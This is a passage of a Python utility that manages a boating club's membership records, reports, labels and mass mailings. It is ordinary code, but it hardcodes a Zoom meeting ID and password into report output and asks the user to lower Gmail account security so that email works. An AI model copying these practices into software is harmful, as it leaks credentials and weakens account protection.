'{}'\".format(args['-p']))\n sys.exit()\n\n\ndef assign_default_files(club, args):\n \"\"\"\n Assigns the following attributes to :\n infile, and the following 'spot' file names:\n applicant_spot, sponsor_spot,\n extra_fees_spot, contacts_spot\n \"\"\"\n if args['-i']:\n club.infile = args['-i']\n else:\n club.infile = Club.MEMBERSHIP_SPoT\n if args['-A']:\n club.applicant_spot = args['-A']\n else:\n club.applicant_spot = Club.APPLICANT_SPoT\n if args['-S']:\n club.sponsor_spot = args['-S']\n else:\n club.sponsor_spot = Club.SPONSORS_SPoT\n if args['-X']:\n club.extra_fees_spot = args['-X']\n else:\n club.extra_fees_spot = Club.EXTRA_FEES_SPoT\n if args['-C']:\n club.contacts_spot = args['-C']\n else:\n club.contacts_spot = Club.CONTACTS_SPoT\n\n\ndef confirm_file_present_and_up2date(file_name):\n \"\"\"\n Asks user to confirm that the file is current.\n Aborts the program if file_name doesn't exist.\n Used for the gmail contacts.csv file.\n \"\"\"\n if not os.path.exists(file_name):\n print(\"File '{}' expected but not found.\".format(file_name))\n sys.exit()\n response = input(\"Is file '{}' present and up to date? \"\n .format(file_name))\n if response and response[0] in \"Yy\":\n return True\n else:\n print(\"Update the file before rerunning utility.\")\n sys.exit()\n\n\ndef output(data, destination=args[\"-o\"], announce_write=True):\n \"\"\"\n Sends data (text) to destination as specified\n by the -o command line parameter (which\n defaults to stdout.)\n Reports file manipulations to stdout.\n \"\"\"\n if destination == 'stdout':\n print(data)\n elif destination == 'printer':\n with open(TEMP_FILE, \"w\") as fileobj:\n fileobj.write(data)\n print('Data written to temp file \"{}\".'.format(fileobj.name))\n subprocess.run([\"lpr\", TEMP_FILE])\n subprocess.run([\"rm\", TEMP_FILE])\n print('Temp file \"{}\" deleted after printing.'\n .format(fileobj.name))\n else:\n with open(destination, \"w\") as fileobj:\n fileobj.write(data)\n if announce_write:\n print('Data written to \"{}\".'.format(fileobj.name))\n\n\n# Medium specific classes:\n# e.g. labels, envelopes, ...\n# These classes, one for each medium, need never be instantiated.\n# They are used only to maintain a set of constants and\n# are named beginning with a letter (A - Avery, E - Envelope, ...)\n# followed by a 4 digit number: A5160, E0000, ... 
.\n# Clients typically refer to these as .\n\n\nclass Dummy(object):\n \"\"\" REDACTED\n a Dummy class for use when templates are not required\"\"\"\n formatter = \"\"\n\n @classmethod\n def self_check(cls): # No need for the sanity check in this case\n pass\n\n\nclass E0000(object):\n \"\"\"\n REDACTED.\n Custom envelopes used by the Bolinas Rod & Boat Club\n to send out requests for dues.\n \"\"\"\n n_chars_wide = 60\n n_lines_long = 45\n n_labels_page = 1\n n_lines_per_label = 10\n\n n_chars_per_field = 25\n separation = (34, )\n top_margin = 32\n\n left_formatter = (\" \" * separation[0] +\n \"{{:<{}}}\".format(n_chars_per_field))\n right_formatter = (\" \" * separation[0] + \"{{:>{}}}\"\n .format(n_chars_per_field))\n empty_line = \"\"\n\n @classmethod\n def self_check(cls):\n \"\"\"\n No need for the sanity check in this case.\n \"\"\"\n pass\n\n\nclass A5160(object):\n \"\"\"\n Avery 5160 labels 3 x 10 grid\n zero based:\n 1, 28, 56\n 3, 9, 15, 21, 27, 33, 39, 45, 51, 57\n (max content 5 lines of 25 characters each)\n Uses \"letter size\" blanks.\n BUT: there was a complication- my printer \"wraps\" at 80 chars.\n So each line could not exceed 80 characters.\n \"\"\"\n\n # The first two are restrictions imposed by my printer!\n n_chars_wide = 80 # The Avery labels are wider ?84 I think?\n n_lines_long = 64\n\n n_labels_per_page = 30\n n_labels_per_row = 3\n n_rows_per_page = n_labels_per_page // n_labels_per_row\n n_lines_per_label = 6 # Limits 'spill over' of long lines.\n\n # Because of the n_chars_wide restriction, can't use the full\n # width of the labels :\n n_chars_per_field = 23\n # /------left_margin (spaces before 1st field in row)\n # | /----between 1st and 2nd\n # | | /--between 2nd & 3rd\n # | | | # These numbers refer to the room to be\n # v v v # left before and between the labels.\n separation = (2, 4, 5)\n line_length_needed = 0\n for n in separation:\n line_length_needed += n\n line_length_needed += n_labels_per_row * n_chars_per_field\n\n top_margin = 2 # The number of blank lines at top of each page.\n\n empty_label = [\"\"] * n_lines_per_label\n\n left_formatter = (\"{{:<{}}}\".format(n_chars_per_field))\n right_formatter = (\"{{:>{}}}\".format(n_chars_per_field))\n empty_line = left_formatter.format(\" \")\n\n def __init__(self):\n pass\n\n @classmethod\n def self_check(cls):\n \"\"\"\n Provides a 'sanity check'.\n \"\"\"\n if cls.line_length_needed > cls.n_chars_wide:\n print(\"Label designations are incompatable!\")\n sys.exit()\n\n\nmedia = dict( # keep the classes in a dict\n e000=E0000,\n a5160=A5160,\n )\n\n\ndef ck_data_cmd(args=args):\n print(\"Checking for data consistency...\")\n club = Club()\n assign_default_files(club, args)\n confirm_file_present_and_up2date(club.CONTACTS_SPoT)\n output(\"\\n\".join(data.ck_data(club, fee_details=args['-d'])))\n\n\ndef show_cmd(args=args):\n club = Club()\n assign_default_files(club, args)\n club.for_web = True\n print(\"Preparing membership listings...\")\n err_code = member.traverse_records(\n club.infile,\n [member.add2lists, ],\n club)\n ret = [\"\"\"FOR MEMBER USE ONLY\n\nTHE TELEPHONE NUMBERS, ADDRESSES AND EMAIL ADDRESSES OF THE BOLINAS ROD &\nBOAT CLUB MEMBERSHIP CONTAINED HEREIN ARE NOT TO BE REPRODUCED OR DISTRIBUTED\nFOR ANY PURPOSE WITHOUT THE EXPRESS PERMISSION OF THE BOARD OF THE BRBC.\n\nData maintained by the Membership Chair and posted here by Secretary {}.\n\"\"\".format(club.SECRETARY)]\n\n if club.members:\n helpers.add_header2list(\"Club Members ({} in number as of {})\"\n 
.format(club.nmembers, helpers.date),\n ret, underline_char='=',\n extra_line=True)\n ret.extend(club.members)\n if club.honorary:\n helpers.add_header2list(\n \"Honorary Club Members\"\n .format(club.nhonorary, helpers.date),\n ret, underline_char='=', extra_line=True)\n ret.extend(club.honorary)\n if club.by_n_meetings:\n header = (\"Applicants ({} in number)\"\n .format(club.napplicants))\n helpers.add_header2list(header, ret, underline_char='=')\n # ####\n club.sponsors = data.get_sponsors(club.sponsor_spot)\n club.meeting_dates = data.get_meeting_dates(\n club.applicant_spot)\n ret.extend(member.show_by_status(club.by_n_meetings, club=club))\n output(\"\\n\".join(ret))\n print(\"...results sent to {}.\".format(args['-o']))\n\n\ndef names_only_cmd(args=args):\n club = Club()\n assign_default_files(club, args)\n print(\"Preparing listing of member and applicant names...\")\n err_code = member.traverse_records(club.infile,\n [member.add2names, ],club)\n ret = [\"Members and Applicants of the Bolinas Rod & Boat Club\",\n \"=====================================================\"]\n if args['-w']:\n club.names = helpers.tabulate(club.names,\n max_width=int(args['-w']),\n separator=' ')\n ret.extend(club.names)\n output('\\n'.join(ret))\n\n\n\ndef collect_stati_data(club):\n err_code = member.traverse_records(\n club.infile,\n [member.add2stati_by_m,\n member.add2demographics,\n member.add2ms_by_status,\n member.increment_napplicants,\n ],\n club)\n\n\ndef assign_applicant_files(club):\n club.applicant_spot = args['-A']\n if not club.applicant_spot:\n club.applicant_spot = Club.APPLICANT_SPoT\n club.sponsor_file = args['-S']\n if not club.sponsor_file:\n club.sponsor_file = Club.SPONSORS_SPoT\n\n\ndef setup4stati(club):\n club.infile = args[\"-i\"]\n if not club.infile:\n club.infile = Club.MEMBERSHIP_SPoT\n assign_applicant_files(club)\n if not hasattr(club, \"include_addresses\"):\n club.include_addresses = args['-D']\n if not hasattr(club, \"include_dates\"):\n club.include_dates = args['-M']\n if not hasattr(club, \"include_sponsors\"):\n club.include_sponsors = args['-B']\n if not hasattr(club, \"which2show\"):\n whch2show = args['--mode'] # signals stati to show\n if whch2show:\n if 'applic' in whch2show:\n club.stati2show = set(member.APPLICANT_STATI)\n else:\n club.stati2show = set(whch2show.split(member.SEPARATOR))\n else:\n club.stati2show = set(member.STATI)\n if not club.stati2show.issubset(member.STATI):\n print('Invalid <--mode> parameter provided.')\n sys.exit()\n if club.include_sponsors:\n club.sponsors = data.get_sponsors(club.sponsor_file)\n if club.include_dates:\n club.meeting_dates = data.get_meeting_dates(\n club.applicant_spot)\n\n\ndef show_stati(club):\n \"\"\"\n Returns a list of strings (that can be '\\n'.join(ed))\n Assumes existance of following club attributes:\n ms_by_status\n +/- stati2show\n +/- napplicants\n +/- demographics\n +/- meeting_dates\n +/- sponsors\n +/- special_notices_by_m\n See client: stati_cmd() (+/- show_cmd and others?)\n \"\"\"\n print(\"Using show_stati function (in utils.py)\")\n if not club.ms_by_status:\n return [\"Found No Entries with 'Status' Content.\"]\n ret = []\n applicant_header_written = False\n if hasattr(club, 'stati2show'):\n stati2show = sorted(club.stati2show & club.ms_by_status.keys())\n else:\n stati2show = sorted(club.ms_by_status.keys())\n if hasattr(club, 'special_notices_by_m'):\n special_notice_members = set(club.special_notices_by_m.keys())\n else:\n special_notice_members = None\n for status in stati2show:\n if 
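# Sketch of the ms_by_status structure that show_stati consumes: a mapping
# from status code to the members holding it, built here with a defaultdict.
# Field names are illustrative, and '|' is assumed as member.SEPARATOR, as
# suggested by report_cmd's "m|w|be|ba".split('|').
from collections import defaultdict

records = [
    {'name': 'Doe, Jane', 'status': 'a1'},
    {'name': 'Roe, Rich', 'status': 'a1|w'},
    {'name': 'Poe, Edgar', 'status': ''},
]

ms_by_status = defaultdict(list)
for rec in records:
    for status in filter(None, rec['status'].split('|')):
        ms_by_status[status].append(rec['name'])

# sorted(ms_by_status) -> ['a1', 'w'], mirroring the stati2show iteration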
hasattr(club, 'napplicants'):\n applicant_header = (\"Applicants ({} in number)\"\n .format(club.napplicants))\n else:\n applicant_header = \"Applicants\"\n if status.startswith('a'):\n if not applicant_header_written:\n helpers.add_header2list(\n applicant_header,\n ret, underline_char='=')\n applicant_header_written = True\n helpers.add_header2list(member.STATUS_KEY_VALUES[status],\n ret, underline_char='-')\n for applicant in sorted(club.ms_by_status[status]):\n if (hasattr(club, 'demographics')\n and club.include_addresses):\n ret.append(club.demographics[applicant])\n else:\n ret.append(applicant)\n if hasattr(club, 'meeting_dates'):\n if club.meeting_dates[applicant]:\n ret.append('\\tDates(s) attended: {}'.\n format(club.meeting_dates[applicant]))\n # else:\n # ret.append('\\tNo meetings yet.')\n if hasattr(club, 'sponsors'):\n ret.append('\\tSponsors: {}'.\n format(club.sponsors[applicant]))\n else:\n helpers.add_header2list(member.STATUS_KEY_VALUES[status],\n ret, underline_char='=')\n for status_holder in sorted(club.ms_by_status[status]):\n if hasattr(club, 'demographics'):\n ret.append(club.demographics[status_holder])\n# line = (club.demographics[status_holder])\n# if (special_notice_members and\n# status_holder in special_notice_members\n# ):\n# line = ('{} {}'.format(\n# line,\n# club.special_notices_by_m[status_holder]))\n# ret.append(line)\n else:\n ret.append(status_holder)\n return ret\n\n\ndef report_cmd(args=args):\n club = Club()\n assign_default_files(club, args=args)\n club.for_web = False\n print(\"Preparing Membership Report ...\")\n err_code = member.traverse_records(\n club.infile,\n [member.add2lists,\n member.add2ms_by_status,\n ],\n club)\n report = []\n helpers.add_header2list(\"Membership Report (prepared {})\"\n .format(helpers.date),\n report, underline_char='=')\n report.append('')\n report.append('Club membership currently stands at {}.'\n .format(club.nmembers))\n\n if club.by_n_meetings:\n header = (\"Applicants ({} in number, \"\n .format(club.napplicants) +\n \"with meeting dates & sponsors listed)\")\n helpers.add_header2list(header, report, underline_char='=')\n # ####\n club.sponsors = data.get_sponsors(club.sponsor_spot)\n club.meeting_dates = data.get_meeting_dates(\n club.applicant_spot)\n report.extend(member.show_by_status(club.by_n_meetings, club=club))\n if 'r' in club.ms_by_status:\n header = ('Members ({} in number) retiring from the Club:'\n .format(len(club.ms_by_status['r'])))\n report.append('')\n helpers.add_header2list(header, report, underline_char='=')\n for name in club.ms_by_status['r']:\n report.append(name)\n\n misc_stati = member.show_by_status(\n club.ms_by_status, stati2show=\"m|w|be|ba\".split('|'))\n if misc_stati:\n header = \"Miscelaneous Info\"\n helpers.add_header2list(header, report, underline_char='=')\n report.extend(misc_stati)\n redact = '''\n club_ = club_setup4extra_charges()\n club_.presentation_format = 'listings'\n report.append(\"\"\"\n\n\nFor Docks and Yard Committee\n============================\n\nI continue to include the following listing of extra fees\nbeing charged to serve as a reminder to let me know if any\nchanges are to be made before charges are applied for the\nnext (July 1, 2021-June 30, 2022) membership year.\n\n\"\"\")\n report.extend(data.extra_charges(club_, raw=True))\n '''\n\n try:\n with open(glbs.DEFAULT_ADDENDUM2REPORT_FILE, 'r') as fobj:\n print('Opening file: {}'.format(fobj.name))\n addendum = fobj.read()\n report.append(addendum)\n except FileNotFoundError:\n 
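# helpers.add_header2list is used throughout report_cmd and show_stati
# above; a plausible minimal implementation consistent with those call
# sites (this is an assumption -- the real helper lives in helpers.py and
# may differ in details such as where the extra blank line goes):
def add_header2list(header, lst, underline_char='=', extra_line=False):
    if extra_line:
        lst.append('')
    lst.append(header)
    lst.append(underline_char * len(header))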
print('report.addendum not found')\n report.extend(\n ['', '',\n \"Respectfully submitted by...\\n\\n\",\n \"Alex Kleider, Membership Chair,\",\n \"for presentation {}.\"\n .format(helpers.next_first_friday(exclude=True)),\n ])\n report.extend(\n ['',\n 'PS Zoom ID: 527 109 8273; Password: 999620',\n ])\n output(\"\\n\".join(report))\n print(\"...results sent to {}.\".format(args['-o']))\n\n\ndef stati_cmd(args=args):\n club = Club()\n collect_stati_data(club)\n setup4stati(club)\n print(\"Preparing 'Stati' Report ...\")\n output('\\n'.join(show_stati(club)))\n\n\ndef zeros_cmd(args=args):\n \"\"\"\n Reports those with zero vs NIL in fees field.\n \"\"\"\n infile = args['-i']\n if not infile:\n infile = Club.MEMBERSHIP_SPoT\n club = Club()\n err_code = member.traverse_records(\n infile, [member.get_zeros_and_nulls, ], club)\n res = [\"Nulls:\",\n \"======\", ]\n res.extend(club.nulls)\n res.extend([\"\\nZeros:\",\n \"======\", ])\n res.extend(club.zeros)\n output('\\n'.join(res))\n\n\ndef usps_cmd(args=args):\n \"\"\"\n Generates a csv file used by the Secretary to send out minutes.\n first,last,address,town,state,postal_code\n (Members who are NOT in the 'email only' category.)\n \"\"\"\n infile = args['-i']\n if not infile:\n infile = Club.MEMBERSHIP_SPoT\n club = Club()\n club.usps_only = []\n err_code = member.traverse_records(infile, [\n member.get_usps,\n member.get_secretary,\n member.get_bad_emails,\n ], club)\n print(\"There are {} members without an email address.\"\n .format(len(club.usps_only)))\n res = []\n header = []\n for key in club.fieldnames:\n header.append(key)\n if key == \"postal_code\":\n break\n res.append(\",\".join(header))\n res.extend(club.usps_only)\n # The following 2 lines are commented out because new secretary\n # Michael Rafferty doesn't need/want to be on the list.\n# if hasattr(club, 'secretary'):\n# res.append(club.secretary)\n if club.bad_emails:\n print(\"... and {} more with a non-functioning email.\"\n .format(len(club.bad_emails)))\n res.extend(club.bad_emails)\n return '\\n'.join(res)\n\n\ndef club_setup4extra_charges(args=args):\n \"\"\"\n Returns an instance of rbc.Club set up with what's needed\n to run the data.extra_charges function.\n \"\"\"\n club = Club()\n club.infile = args[\"-i\"]\n if not club.infile:\n club.infile = club.EXTRA_FEES_SPoT\n club.json_file = args['-j']\n try:\n club.max_width = int(args['-w'])\n except TypeError:\n print(\"'-w' option must be an integer\")\n sys.exit()\n club.presentation_format = args['-f']\n club.bad_format_warning = \"\"\"Bad argument for '-f' option...\nChoose one of the following: [default: table]\n 'table' listing of names /w fees tabulated (=> 2 columns.)\n 'listing' same format as Data/extra_fees.txt\n 'listings' side by side lists (best use landscape mode.) 
\"\"\"\n return club\n\n\n\ndef extra_charges_cmd(args=args):\n \"\"\"\n Returns a report of members with extra charges.\n It also can create a json file: specified by the -j option.\n \"\"\"\n output('\\n'.join(data.extra_charges(club_setup4extra_charges())))\n\n\ndef payables_cmd(args=args):\n \"\"\"\n Sets up club attributes still_owing and advance_payments (both\n of which are lists) and then calls member.get_payables which\n traverses the db populating them.\n \"\"\"\n infile = args['-i']\n if not infile:\n infile = Club.MEMBERSHIP_SPoT\n club = Club()\n club.still_owing = []\n club.advance_payments = []\n output = []\n err_code = member.traverse_records(infile,\n member.get_payables,\n club)\n if club.still_owing:\n helpers.add_header2list(\n \"Members owing ({} in number)\"\n .format(len(club.still_owing)),\n output, underline_char='=', extra_line=True)\n if args['-T']:\n tabulated = helpers.tabulate(club.still_owing,\n max_width=int(args['-w']),\n separator=' ')\n output.extend(tabulated)\n else:\n output.extend(club.still_owing)\n if club.advance_payments:\n output.append(\"\\n\")\n output.extend([\"Members with a Credit\",\n \"---------------------\"])\n output.extend(club.advance_payments)\n return '\\n'.join(output)\n\n\ndef show_mailing_categories_cmd(args=args):\n \"\"\"\n Needs to be rewritten to take advantage of the -T and -w \n options.\n \"\"\"\n ret = [\"Possible choices for the '--which' option are: \", ]\n ret.extend(\n helpers.tabulate(\n [key for key in content.content_types.keys()],\n separator=' '))\n# ret.extend(((\"\\t\" + key) for key in content.content_types.keys()))\n output('\\n'.join(ret))\n\n\ndef prepare4mailing(club):\n \"\"\"\n Set up configuration in an instance of rbc.Club.\n \"\"\"\n club.owing_only = False\n if args['--oo']:\n club.owing_only = True\n if not args['--which']:\n club.which = content.content_types[\"thank\"]\n else:\n club.which = content.content_types[args[\"--which\"]]\n club.lpr = content.printers[args[\"-p\"]]\n club.email = content.prepare_email_template(club.which)\n club.letter = content.prepare_letter_template(club.which,\n club.lpr)\n if not args[\"-i\"]:\n args[\"-i\"] = club.MEMBERSHIP_SPoT\n club.input_file_name = args['-i']\n if not args[\"-j\"]:\n args[\"-j\"] = club.JSON_FILE_NAME4EMAILS\n club.json_file_name = args[\"-j\"]\n if not args[\"--dir\"]:\n args[\"--dir\"] = club.MAILING_DIR\n club.mail_dir = args[\"--dir\"]\n club.attachment = args['ATTACHMENTS']\n club.cc = args['--cc']\n club.bcc = args['--bcc']\n # *** Check that we don't overwrite previous mailings:\n if club.which[\"e_and_or_p\"] in (\"both\", \"usps\", \"one_only\"):\n print(\"Checking for directory '{}'.\".format(args[\"--dir\"]))\n club.check_mail_dir(club.mail_dir)\n if club.which[\"e_and_or_p\"] in (\"both\", \"email\", \"one_only\"):\n print(\"Checking for file '{}'.\".format(club.json_file_name))\n club.check_json_file(club.json_file_name)\n club.json_data = []\n\n\ndef prepare_mailing_cmd(args=args):\n \"\"\"\n See description under 'Commands' heading in the docstring.\n Sets up an instance of rbc.Club with necessary attributes and\n then calls member.prepare_mailing.\n \"\"\"\n # ***** Set up configuration in an instance of Club:\n club = Club()\n prepare4mailing(club)\n # ***** Done with configuration & checks ...\n member.prepare_mailing(club) # Populates club.mail_dir\n # and moves json_data to file.\n print(\"\"\"prepare_mailing completed..\n ..next step might be the following:\n $ zip -r 4Michael {}\"\"\".format(args[\"--dir\"]))\n\n\ndef 
setup4new_db(club):\n club.infile = args['-i']\n club.outfile = args['-o']\n club.extra_fees_spot = args['-X']\n# club.owing_only = args['--oo'] # Why?! Plan 2 delete.\n if not club.infile:\n club.infile = club.MEMBERSHIP_SPoT\n# print('club.outfile set to {}'.format(club.outfile))\n if club.outfile == 'stdout' or not club.outfile:\n club.outfile = helpers.prepend2file_name('new_', club.infile)\n# print('club.outfile set to {}'.format(club.outfile))\n if not club.extra_fees_spot:\n club.extra_fees_spot = club.EXTRA_FEES_SPoT\n club.fieldnames = data.get_fieldnames(club.infile)\n\n\ndef thank_cmd(args=args):\n club = Club()\n club.thank_file = args[\"-t\"]\n if not club.thank_file:\n club.thank_file = Club.THANK_FILE\n member.traverse_records(club.thank_file,\n [member.add2statement_data, ],\n club)\n # To implement: maintain a record of those thanked...\n club.statement_data_keys = club.statement_data.keys()\n prepare4mailing(club)\n club.input_file_name = club.thank_file\n member.prepare_mailing(club) # => thank_func,\n # Done with thanking; Must now update DB.\n setup4new_db(club)\n dict_write(club.outfile,\n club.fieldnames,\n member.modify_data(club.infile,\n member.credit_payment_func,\n club)\n )\n\n\ndef dict_write(f, fieldnames, iterable):\n \"\"\"\n Writes all records received from <iterable> into a new csv\n file named <f>. <fieldnames> defines the record keys.\n Code written in such a way that <iterable> could be\n a generator function. (See member.modify_data.)\n \"\"\"\n with open(f, 'w') as outfile_obj:\n print(\"Opening {} for output...\".format(outfile_obj.name))\n dict_writer = csv.DictWriter(outfile_obj, fieldnames)\n dict_writer.writeheader()\n for record in iterable:\n dict_writer.writerow(record)\n\n\nredacted = '''\ndef new_db_cmd():\n \"\"\"\n One time use only:\n Eliminated 'email_only' field from data base.\n Already done so can redact this.\n \"\"\"\n if args['-F'] and args['-F'] in member.func_dict:\n func, fieldnames = member.func_dict[args['-F']]\n else:\n print(\"Not a valid function parameter.\")\n print(\"Must be one of the following:\")\n for f in member.func_dict.keys():\n print(\"\\t{}\".format(f))\n print(\"Terminating\")\n sys.exit()\n club = Club()\n setup4new_db(club)\n club.new_fieldnames = fieldnames\n dict_write(club.outfile, fieldnames,\n member.modify_data(club.infile, func, club)\n )\n'''\n\n\ndef display_emails_cmd(args=args):\n records = helpers.get_json(args['-j'], report=True)\n all_emails = []\n n_emails = 0\n for record in records:\n email = []\n for field in record:\n email.append(\"{}: {}\".format(field, record[field]))\n email.append('')\n all_emails.extend(email)\n n_emails += 1\n print(\"Processed {} emails...\".format(n_emails))\n return \"\\n\".join(all_emails)\n\n\ndef ck_lesssecureapps_setting():\n \"\"\"\n Does nothing if not using a gmail account. (--mta ending in 'g')\n If using gmail the account security setting must be lowered:\n https://myaccount.google.com/lesssecureapps\n \"\"\"\n if args['--mta'].endswith('g'):\n print( # Check lesssecureapps setting:\n 'Has \"https://myaccount.google.com/lesssecureapps\" been set')\n response = input(\n '.. and have you responded affirmatively to the warning? 
')\n if ((not response) or not (response[0] in 'Yy')):\n print(\"Emailing won't work until that's done.\")\n sys.exit()\n\n\ndef send_emails_cmd(args=args):\n \"\"\"\n Sends emails prepared by prepare_mailing_cmd.\n See also content.authors_DOCSTRING.\n \"\"\"\n ck_lesssecureapps_setting()\n mta = args[\"--mta\"]\n emailer = args[\"--emailer\"]\n if emailer == \"python\":\n emailer = Pymail.send.send\n print(\"Using Python modules to dispatch emails.\")\n elif emailer == \"bash\":\n emailer = Bashmail.send.send\n print(\"Using Bash to dispatch emails.\")\n else:\n print('\"{}\" is an unrecognized \"--emailer\" option.'\n .format(emailer))\n sys.exit(1)\n wait = mta.endswith('g')\n json_data = helpers.get_json(args['-j'], report=True)\n emailer(json_data, mta, include_wait=wait)\n\n\ndef print_letters_cmd(args=args):\n \"\"\"\n Deprecated in favour of simply using 'lpr' cmd.\n \"\"\"\n successes = []\n failures = []\n for letter_name in os.listdir(args[\"--dir\"]):\n path_name = os.path.join(args[\"--dir\"], letter_name)\n completed = subprocess.run([\"lpr\", path_name])\n if completed.returncode:\n failures.append(\"Problem ({}) printing '{}'.\"\n .format(completed.returncode, path_name))\n else:\n successes.append(\"{}\".format(path_name))\n if successes:\n successes = (\"Following letters printed successfully:\\n\"\n + '\\n'.join(successes))\n else:\n successes = \"No file was printed successfully.\"\n if failures:\n failures = (\"Following letters failed to print:\\n\"\n + '\\n'.join(failures))\n else:\n failures = \"All files printed successfully.\"\n report = successes + args['--separator'] + failures\n output(report)\n\n\ndef emailing_cmd(args=args):\n \"\"\"\n Uses mutt (in member.send_attachment.)\n Sends emails with an attachment.\n Sets up an instance of Club and traverses\n the input file calling member.send_attachment\n on each record.\n \"\"\"\n club = Club()\n club.mutt_send = mutt_send\n if not args[\"-i\"]:\n args[\"-i\"] = club.MEMBERSHIP_SPoT\n with open(args[\"-c\"], \"r\") as content_file:\n club.content = content_file.read()\n err_code = member.traverse_records(args[\"-i\"],\n member.send_attachment,\n club=club)\n\n\ndef restore_fees_cmd(args=args):\n \"\"\"\n If records are found with balance still outstanding, these are\n reported to errors. Also reported will be anyone listed as paying\n fees but not found amongst members.\n Repopulates the club's master list with the ANNUAL_DUES constant\n and any fees being charged as specified in the file specified by\n 'args['']'.\n The -i is not changed.\n If '-o ' is specified, output goes there,\n if not, output goes to a file named by concatenating 'new_' with\n the name of the input file.\n \"\"\"\n # ## During implementation, be sure to ... ###\n # ## Take into consideration the possibility of credit values. 
###\n club = Club()\n setup4new_db(club)\n data.restore_fees(club) # Populates club.new_db & club.errors\n data.save_db(club.new_db, club.outfile, club.fieldnames)\n if club.errors:\n output('\\n'.join(\n ['Note the following irregularities:',\n '==================================', ]\n + club.errors), destination=args['-e'])\n\n# if club.still_owing:\n# pass\n if club.errors and args[\"-e\"]:\n with open(args[\"-e\"], 'w') as file_obj:\n file_obj.write('\\n'.join(club.errors))\n print('Wrote errors to \"{}\".'.format(file_obj.name))\n# if ret:\n# sys.exit(ret)\n\n\ndef fee_intake_totals_cmd(args=args):\n \"\"\"\n This command deals with the manual method of entering receipts.\n Eventually this will be deprecated in favour of the thank_cmd\n \"\"\"\n outfile = args['-o']\n errorfile = args['-e']\n club = Club()\n if args['-i']:\n fees_taken_in = club.fee_totals(infile=args['-i'])\n else:\n fees_taken_in = club.fee_totals()\n fees_taken_in.append(\" \")\n res = '\\n'.join(fees_taken_in)\n output(res)\n if club.invalid_lines and errorfile:\n print('Writing possible errors to \"{}\".'\n .format(errorfile))\n output('\\n'.join(club.invalid_lines),\n errorfile, announce_write=False)\n\n\ndef labels_cmd(args=args):\n if args[\"-P\"]:\n medium = media[args[\"-P\"]]\n else:\n medium = A5160\n club = Club(medium)\n source_file = args[\"-i\"]\n return club.get_labels2print(source_file)\n\n\ndef envelopes_cmd(args=args):\n if args[\"-P\"]:\n medium = media[args[\"-P\"]]\n else:\n medium = E0000\n club = Club(medium)\n source_file = args[\"-i\"]\n club.print_custom_envelopes(source_file)\n\n\ndef wip_cmd(args=args):\n \"\"\"\n Code under development (work in progress) temporarily housed here.\n \"\"\"\n applicants = data.get_applicant_data(Club.APPLICANT_SPoT,\n Club.SPONSORS_SPoT)\n for key in applicants.keys():\n if applicants[key]['dates']:\n print(\"{}: Meeting dates {}\"\n .format(key, applicants[key]['dates']))\n else:\n print(\"{}: No meetings attended to date.\"\n .format(key))\n print(\"\\tsponsors are {}\".format(applicants[key]['sponsors']))\n return\n\n\n# # Plan to redact the next two functions in favour of using\n# # the Python mailing modules instead of msmtp and mutt.\n# # For the time being the Python modules are being used\n# # when sending via Easydns.com but msmtp is still being\n# # used when gmail is the MTA.\n\n\n'''\ndef smtp_send(recipients, message):\n \"\"\"\n Send email, as defined in <message>,\n to the <recipients> who will receive this email\n from the Bolinas Rod and Boat Club.\n <recipients> must be an iterable of one or more email addresses.\n Note: Must first lower br&bc's account security at:\n https://myaccount.google.com/lesssecureapps\n Also Note: <message> must be in proper format with\n \"From:\", \"To:\" & \"Subject:\" lines (no leading spaces!) followed\n by a blank line and then the text of the email. 
The \"From:\" line\n should read as follows: \"From: rodandboatclub@gmail.com\"\n \"\"\"\n cmd_args = [\"msmtp\", \"-a\", glbs.MSMTP_ACCOUNT, ]\n for recipient in recipients:\n cmd_args.append(recipient)\n p = subprocess.run(cmd_args, stdout=subprocess.PIPE,\n input=message, encoding='utf-8')\n if p.returncode:\n print(\"Error: {} ({})\".format(\n p.stdout, recipient))\n'''\n\n\ndef mutt_send(recipient, subject, body, attachments=None):\n \"\"\"\n Does the mass e-mailings with attachment(s) which, if\n provided, must be in the form of a list of files.\n \"\"\"\n cmd_args = [\"mutt\", \"-F\", args[\"-F\"], ]\n cmd_args.extend([\"-s\", \"{}\".format(subject)])\n if attachments:\n list2attach = ['-a']\n for path2attach in attachments:\n list2attach.append(path2attach)\n cmd_args.extend(list2attach)\n cmd_args.extend([\"--\", recipient])\n p = subprocess.run(cmd_args, stdout=subprocess.PIPE,\n input=body, encoding='utf-8')\n if p.returncode:\n print(\"Error: {} ({})\".format(\n p.stdout, recipient))\n\n\nif __name__ == \"__main__\":\n # print(args)\n\n if args[\"?\"]:\n doc_lines = __doc__.split('\\n')\n for n in range(len(doc_lines)):\n if doc_lines[n] == \"Usage:\":\n uline = n\n if doc_lines[n] == \"Options:\":\n oline = n\n break\n print('\\n'.join(doc_lines[uline:oline - 1]))\n elif args[\"ck_data\"]:\n ck_data_cmd()\n elif args[\"show\"]:\n show_cmd()\n elif args[\"names_only\"]:\n names_only_cmd()\n elif args[\"report\"]:\n report_cmd()\n elif args[\"stati\"]:\n stati_cmd()\n elif args[\"zeros\"]:\n zeros_cmd()\n elif args[\"usps\"]:\n print(\"Preparing a csv file listing showing members who\")\n print(\"receive meeting minutes by mail. i.e. don't have (or\")\n print(\"haven't provided) an email address (to the Club.)\")\n output(usps_cmd())\n elif args[\"extra_charges\"]:\n print(\"Selecting members with extra charges:\")\n extra_charges_cmd()\n elif args[\"payables\"]:\n print(\"Preparing listing of payables...\")\n output(payables_cmd())\n elif args['show_mailing_categories']:\n show_mailing_categories_cmd()\n elif args[\"prepare_mailing\"]:\n print(\"Preparing emails and letters...\")\n prepare_mailing_cmd()\n print(\"...finished preparing emails and letters.\")\n elif args[\"thank\"]:\n print(\"Preparing thank you emails and/or letters...\")\n thank_cmd()\n# print(\"...finished preparing thank you emails and/or letters.\")\n elif args['display_emails']:\n output(display_emails_cmd())\n elif args[\"send_emails\"]:\n print(\"Sending emails...\")\n send_emails_cmd()\n print(\"Done sending emails.\")\n elif args[\"print_letters\"]:\n print(\"Printing letters ...\")\n print_letters_cmd()\n print(\"Done printing letters.\")\n elif args['emailing']:\n emailing_cmd()\n elif args['restore_fees']:\n restore_fees_cmd()\n elif args['fee_intake_totals']:\n fee_intake_totals_cmd()\n elif args[\"labels\"]:\n print(\"Printing labels from '{}' to '{}'\"\n .format(args['-i'], args['-o']))\n output(labels_cmd())\n elif args[\"envelopes\"]:\n # destination is specified within Club\n # method print_custom_envelopes() which is called\n # by print_statement_envelopes()\n print(\"\"\"Printing envelopes...\n addresses sourced from '{}'\n with output sent to '{}'\"\"\"\n .format(args['-i'], 